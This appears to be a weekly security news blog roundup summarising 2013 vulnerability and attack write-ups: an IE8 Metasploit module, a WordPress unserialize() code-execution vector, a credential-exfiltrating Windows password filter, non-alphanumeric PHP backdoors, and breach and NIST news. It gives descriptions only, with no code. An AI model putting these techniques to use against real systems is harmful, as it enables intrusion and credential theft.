Security News #0x52
- Last week we discussed a Metasploit module for an Internet Explorer vulnerability; well here is another. This one was patched in MS13-055, and the underlying flaw (CVE 2013-3163) is a use after free issue. The module is written only for Internet Explorer 8, on Windows 7 (or XP).
- This is not so much an exploit, as a description of an attack vector (as no PoC code is available). Tom Van Goethem has a fantastic piece on how to exploit WordPress prior to 3.6.1. His idea is to use the PHP function unserialize(). As noted on the PHP web site, passing untrusted data to this function is, well, bad. As in remote code execution bad. He is able to pick out a few cases in WordPress where the function is called, and then find a way to get user supplied data to the function. A great piece, and a great write-up. If you want to get a broader perspective, rather than a technical one, you might want to take a look at the Threatpost piece.
- Mac OSX has been showing up here lately, for all the wrong reasons. This week we draw your attention to a post of MagerValp who discovered back in May that logging in to OSX 10.7 – 10.8.4 can result in the clear text password being exposed to other logged in users.
- Carnal0wnage describes how he used a custom Windows password filter at the National CCDC that would send out credentials back to the attacker anytime they were changed on the domain controller.
- Did you realize that you can write a PHP Backdoor without using any alphanumeric characters?
- Graham Sutherland has a nice piece, where he shows how he found that the Dropbox client does not enforce ASLR. This could be problematic, as it may allow attackers an easier way to develop ROP chains.
- While we are talking about Dropbox, there was a nice pair of pieces on how and why Dropbox apparently opens and scans certain file types that are uploaded to their service. The take away from the second piece was that this is being done to make them more easily accessible via web browsers.
- Vodaphone Germany appears to have lost personal details, including banking information, for some two million customers.
- Ars Technica reports that the NIST is recommending that some previously published encryption standards not be used due to security concerns, possibly related to the latest NSA revalations.
- Here is the post of Matt Green on NSA that was asked to be removed. If you don’t know the story, check out the discussion in Ars Technica.